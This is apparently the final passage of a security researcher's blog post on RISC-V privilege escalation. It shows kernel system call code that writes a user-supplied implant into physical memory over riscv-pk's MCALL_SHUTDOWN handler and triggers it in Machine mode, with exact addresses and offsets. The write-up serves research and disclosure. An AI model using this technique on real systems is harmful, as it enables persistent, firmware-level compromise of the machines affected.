                /* install implant at physical address a2 */
                /* NOTE: x (a void __iomem * for the ioremap'd region) and r
                 * (the return value) are assumed to be declared earlier in
                 * the augmented system call handler, outside this excerpt. */
                else if(regs->a1 == 8)
                {
                        uint8_t * c;
                        int i;
                        
                        /* Overwrite an address a2 of maximum size 4096 with
                         * binary code pointed to by a4 of size a3.
                         */
                        printk( 
                                "DONB: overwriting %p:%lx\n",
                                (const void * )regs->a2,
                                regs->a3);
                        
                        x = ioremap(regs->a2, 4096);
                        printk("DONB: remapped to %p\n", x);
                        
                        r = -1;
                        if(!access_ok(VERIFY_READ, regs->a4, regs->a3))
                        {       
                                printk("DONB: bad access_ok\n");
                                goto __bad_copy;
                        }
                        
                        printk("DONB: access ok\n");
                        if(regs->a3 <= 0 || regs->a3 > 4096)
                        {       
                                printk("DONB: bad a3\n");
                                goto __bad_copy;
                        }
                        
                        printk("DONB: a3 ok\n");
                        
                        if(__copy_from_user(
                                x,
                                (const void * )regs->a4,      
                                regs->a3))
                        {
                                printk("DONB: bad copy from user\n");
                                goto __bad_copy;
                        }

                        printk("DONB: copy ok\n");

                        iounmap(x);

                        /* synchronize the instruction stream so the hart
                         * fetches the newly written code instead of a stale
                         * cached copy */
                        __asm__("fence; fence.i");

The above code installs an implant at the physical address given in system call argument 2. Argument 4 contains a pointer to a userland buffer containing the binary to be written at the mapped virtual address. Argument 3 contains the size of the binary blob to be written. The final fence; fence.i sequence synchronizes the instruction stream since we are altering executable code, which guarantees that the CPU fetches the updated copy of our instructions and won't execute a stale cached copy once triggered.

                /* trigger implant overwritten at MCALL_SHUTDOWN */
                else if(regs->a1 == 9)
                {       
                        printk("DONB(8): ok, now try the m-hook\n");
                        
                        /* MCALL_SHUTDOWN=6 */
                        __asm__("li a7, 6; ecall; mv %0, a0" : "=r" (r));
                        
                        printk("DONB(8): returned = %d\n", r);
                
                }

This code issues an ecall, causing mcall_trap to be executed from Machine mode context. This, in other words, executes our implant at a higher privilege level.

.global callreset
callreset:
        auipc t0, 0
        addi t0, t0, -1578
        addi t0, t0, -1578
        jalr t0

Finally, the above code, written over the MCALL_SHUTDOWN feature in the mcall_trap function, calls our implant at do_reset. The code in my version of riscv-pk expects do_reset at address 0x800001a8 and the overwritten MCALL_SHUTDOWN code at 0x80000dfc. The differential between these two addresses is -3156 bytes (0x800001a8 - 0x80000dfc), which is too large for the 12-bit signed immediate of a single addi, so two addi instructions of -1578 each are used to generate the proper negative offset. This can probably be done in a cleaner manner. 

The only requirement left is for the implant at do_reset to restore the stack and return, to avoid crashing due to an improperly adjusted Machine mode memory layout. This can be accomplished by returning to the mcall_trap function at an address where it performs this functionality. In my implementation, there is only one address where this occurs, 0x80000ccc. 


Gimme Code

For working demonstration code, please visit my GitHub archive, where I will track all of my RISC-V related security research. 

More to come!

Best,

Don A. Bailey
Founder/CEO
Lab Mouse Security
Mastodon: @donb@mastodon.social